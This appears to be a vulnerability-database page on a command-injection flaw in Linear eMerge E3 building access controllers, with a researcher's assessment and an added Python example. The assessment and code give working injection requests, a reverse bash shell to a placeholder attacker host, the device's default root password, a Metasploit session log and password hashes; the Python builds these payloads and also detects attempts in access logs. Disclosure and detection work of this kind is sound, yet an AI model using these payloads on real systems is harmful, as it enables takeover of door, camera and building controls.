CVSS3: 10 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS: 0.974 High
Percentile: 99.9%
Linear eMerge E3-Series devices allow Command Injections.
Recent assessments:
h00die-gr3y at December 03, 2022 12:46pm UTC reported:
Building Automation and Access Control systems are at the heart of many critical infrastructures, and their security is vital. Executing attacks on these systems may enable unauthenticated attackers to access and manipulate doors, elevators, air-conditioning systems, cameras, boilers, lights, safety alarm systems in an entire building – potentially causing physical damage, introducing safety risks or financial repercussions.
In one of our recent security engagements, we stumbled across a Nortek Linear eMerge E3 Access Controller managing all the building and camera access. It was exposed to the Internet for remote management on port 80, and we soon figured out that it was vulnerable.
And guess what, these vulnerabilities were already discovered in 2019 by Gjoko Krstic a.k.a. LiquidWorm from Applied Risk. He published a paper, AR2019005, that demonstrated a raft of critical vulnerabilities that exist on these Building Access Control Systems.
Nortek Security & Control, LLC (NSC), the manufacturer of these Access Control Systems, is a leader in wireless security, home automation and personal safety systems and devices.
They claim that the eMerge E3-Series embedded browser-based network appliance platform makes advanced security technology reliable and affordable for any entry-level access control application.
Well, forget the words advanced security and reliable, because it is pretty tragic to see that the majority of these Linear eMerge E3 access controllers (around 3500 listed in Shodan) are still vulnerable in 2022 and impose a huge security risk on the organizations using these devices for their physical and logical security.
Recently Nice, a global manufacturer of smart home, security and building automation solutions, announced the acquisition of Nortek, and let's hope that this will improve the quality of their security products.
Now let's demonstrate how vulnerable this platform is, and bear in mind that this platform is responsible for building and camera access and is therefore a prime target for malicious actors.
Within the Linear eMerge E3 access controller, several endpoints are vulnerable to a remote command injection (RCE).
http://HOST:PORT/card_scan_decoder.php?No=30&door=%60<CMD>%60
http://HOST:PORT/card_scan.php?No=30&ReaderNo=%60<CMD>%60
http://HOST:PORT/card_scan.php?No=1337&ReaderNo=%60<CMD>%60&CardFormatNo=1337
You can easily demonstrate this with Burp Suite by crafting a request using the sleep command, or by creating a test file with the command whoami > cuckoo.txt, which can then be accessed through the web interface.
Burp request
GET /card_scan_decoder.php?No=30&door=%60sleep+10%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Response, which will take around 10 seconds…
HTTP/1.1 200 OK
X-Powered-By: PHP/5.5.23
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 03 Dec 2022 04:53:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html; charset=utf-8
Connection: close
Date: Sat, 03 Dec 2022 04:53:32 GMT
Server: lighttpd/1.4.22
Content-Length: 67
{"raw":false,"card_format_default":"","total_bit":null,"data":null}
Example with the whoami command
Burp request
GET /card_scan_decoder.php?No=30&door=%60whoami+>cuckoo.txt%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Get cuckoo.txt
GET /cuckoo.txt HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Response
HTTP/1.1 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2943015055"
Last-Modified: Sat, 03 Dec 2022 05:02:15 GMT
Content-Length: 9
Connection: close
Date: Sat, 03 Dec 2022 05:07:06 GMT
Server: lighttpd/1.4.22
lighttpd
This is already pretty interesting for malicious actors to pursue, but there is more to it.
The lighttpd user is restricted from executing certain commands due to a restricted busybox implementation, so it is difficult to get a real reverse shell or meterpreter session established, which would give full control of the server.
Well, do not worry, our Nortek friends also decided to implement a default root password on the access controller, which can easily be picked from /etc/passwd.
Yes, you read it right, /etc/passwd with read rights for the world instead of using /etc/shadow (see my analysis on CVE-2019-7252 for more info).
This password has already been hacked in 2019 and can be used to escalate privileges and get a root shell or meterpreter session.
Let's show a quick example of how we spawn a root shell…
First, generate a payload with msfvenom
# msfvenom -p cmd/unix/reverse_bash LHOST=<ATTACKER> LPORT=<PORT> -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
bash -c '0<&74-;exec 74<>/dev/tcp/<ATTACKER>/<PORT>;sh <&74 >&74 2>&74'
The next step is to create the payload using the default root password davestyle
payload: echo davestyle | su -c "bash -c '0<&74-;exec 74<>/dev/tcp/<ATTACKER>/<PORT>;sh <&74 >&74 2>&74'"
Apply URL encoding to make it work in your Burp request, and start a multi/handler with the reverse_bash payload, <ATTACKER> and <PORT> settings in msf.
URL encode payload: %60echo+davestyle+%7C+su+-c+%22bash+-c+%270%3C%2674-%3Bexec+74%3C%3E%2Fdev%2Ftcp%2F<ATTACKER>%2F<PORT>%3Bsh+%3C%2674+%3E%2674+2%3E%2674%27%22%60
Burp request
GET /card_scan_decoder.php?No=30&door=%60echo+davestyle+%7C+su+-c+%22bash+-c+%270%3C%2674-%3Bexec+74%3C%3E%2Fdev%2Ftcp%2F<ATTACKER>%2F<PORT>%3Bsh+%3C%2674+%3E%2674+2%3E%2674%27%22%60 HTTP/1.1
Host: <IP HOST>
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Metasploit handler
msf6 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on <ATTACKER>:<PORT>
msf6 exploit(multi/handler) > [*] Command shell session 1 opened (127.0.0.1:<PORT> -> 127.0.0.1:48944) at 2022-12-03 11:42:27 +0000
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
whoami
root
ls -l /etc/passwd
-rwxr--r-- 1 e3user linear 733 Nov 13 2012 /etc/passwd
cat /etc/passwd
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
The example above shows that it is pretty simple to weaponize, and therefore there is a high probability of exploitation in the wild.
I have created a Metasploit module that has been submitted to the Metasploit mainstream.
Please update your Linear eMerge E3 access controller to a version higher than 1.00-06.
Nortek Linear eMerge E3-Series 1.00-06 Multiple Vulnerabilities
Packet storm
Metasploit module
Credit goes to the security researcher below, who discovered these vulnerabilities.
Gjoko ‘LiquidWorm’ Krstic
Assessed Attacker Value: 5
packetstormsecurity.com/files/155255/Linear-eMerge-E3-1.00-06-card_scan.php-Command-Injection.html
packetstormsecurity.com/files/155256/Linear-eMerge-E3-1.00-06-card_scan_decoder.php-Command-Injection.html
packetstormsecurity.com/files/155272/Linear-eMerge-E3-Access-Controller-Command-Injection.html
packetstormsecurity.com/files/170372/Linear-eMerge-E3-Series-Access-Controller-Command-Injection.html
applied-risk.com/labs/advisories
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7256
www.applied-risk.com/resources/ar-2019-005
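The following is an added example written for this page; it is not code from the assessment above, from Applied Risk, or from the Metasploit module. It does two things a practitioner wants around this CVE: it regenerates the backtick injection query string for card_scan_decoder.php / card_scan.php for an arbitrary command (the default root password davestyle and the redirect-based bash reverse shell are the ones shown above; the attacker IP, port and the log source addresses are placeholders), and it scans web-server access-log lines for attempts against those two endpoints, which matters because the vulnerable requests need no authentication, so the access log is the only device-side artefact of an attack. The log format is assumed to be common-log-format-like (request in quotes, the three leading fields are not interpreted), and the sample lines are constructed, not captured from a real device.

```python
"""Added example for the Linear eMerge E3 command injection: payload encoding
and access-log detection. Not part of the original assessment."""
import re
from urllib.parse import quote_plus, urlsplit, parse_qs

# Endpoint -> parameter(s) whose value reaches the shell, as listed on the page.
VULNERABLE_PARAMS = {
    "/card_scan_decoder.php": ("door",),
    "/card_scan.php": ("ReaderNo",),
}

# Shell metacharacters that indicate a command is being smuggled into the value.
_SHELL_META = re.compile(r"`|\$\(|;|\||&&|\n")


def build_injection_query(endpoint: str, command: str, **fixed) -> str:
    """Return the query string that wraps `command` in backticks in the
    injectable parameter of `endpoint`, percent-encoded the way Burp/a browser
    sends it (space -> '+', '/' -> '%2F', '`' -> '%60'). `fixed` holds the
    other parameters the endpoint expects (e.g. No=30)."""
    param = VULNERABLE_PARAMS[endpoint][0]
    parts = [f"{k}={quote_plus(str(v))}" for k, v in fixed.items()]
    parts.append(f"{param}={quote_plus('`' + command + '`')}")
    return "&".join(parts)


def root_reverse_shell(attacker: str, port: int, root_pw: str = "davestyle") -> str:
    """The privilege-escalation chain from the page: pipe the default root
    password into su and run the msfvenom cmd/unix/reverse_bash payload as root.
    attacker/port are placeholders supplied by the caller."""
    inner = f"bash -c '0<&74-;exec 74<>/dev/tcp/{attacker}/{port};sh <&74 >&74 2>&74'"
    return f'echo {root_pw} | su -c "{inner}"'


# Common-log-format-like line: src f2 f3 [time] "METHOD target PROTO" status ...
_CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_injection_attempts(log_lines):
    """Return (src, path, param, decoded_value) for every request that puts
    shell metacharacters into an injectable parameter of a vulnerable endpoint.
    parse_qs performs the single percent-decode the server does, so
    %60sleep+10%60 is inspected as `sleep 10`."""
    hits = []
    for line in log_lines:
        m = _CLF.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        url = urlsplit(m.group("target"))
        params = VULNERABLE_PARAMS.get(url.path)
        if not params:
            continue
        qs = parse_qs(url.query, keep_blank_values=True)
        for p in params:
            for value in qs.get(p, []):
                if _SHELL_META.search(value):
                    hits.append((m.group("src"), url.path, p, value))
    return hits


# Constructed sample log lines (placeholder addresses, not a real capture).
SAMPLE_LOG = [
    '10.1.1.5 - - [03/Dec/2022:04:50:01 +0000] "GET /card_scan.php?No=30&ReaderNo=1 HTTP/1.1" 200 67',
    '203.0.113.7 - - [03/Dec/2022:04:53:22 +0000] "GET /card_scan_decoder.php?No=30&door=%60sleep+10%60 HTTP/1.1" 200 67',
    '203.0.113.7 - - [03/Dec/2022:05:02:15 +0000] "GET /card_scan_decoder.php?No=30&door=%60whoami+%3Ecuckoo.txt%60 HTTP/1.1" 200 67',
    '203.0.113.7 - - [03/Dec/2022:05:07:06 +0000] "GET /cuckoo.txt HTTP/1.1" 200 9',
    '198.51.100.2 - - [03/Dec/2022:06:00:00 +0000] "GET /card_scan.php?No=1337&ReaderNo=%60id%60&CardFormatNo=1337 HTTP/1.1" 200 67',
]

if __name__ == "__main__":
    print(build_injection_query("/card_scan_decoder.php", "sleep 10", No=30))
    print(build_injection_query("/card_scan_decoder.php", root_reverse_shell("10.0.0.1", 4444), No=30))
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("ALERT", hit)
```

The encoder reproduces the hand-encoded payload on the page exactly once the placeholders are filled in, so it can be used to check a Burp request before sending it. The detector deliberately decodes only once: lighttpd decodes the query string a single time before PHP sees it, so a double-encoded backtick (%2560) never reaches the shell and is not flagged. A successful file-drop test like the cuckoo.txt example above only shows up as a follow-up GET for the dropped file, which is why the detector keys on the injecting request rather than the fetch.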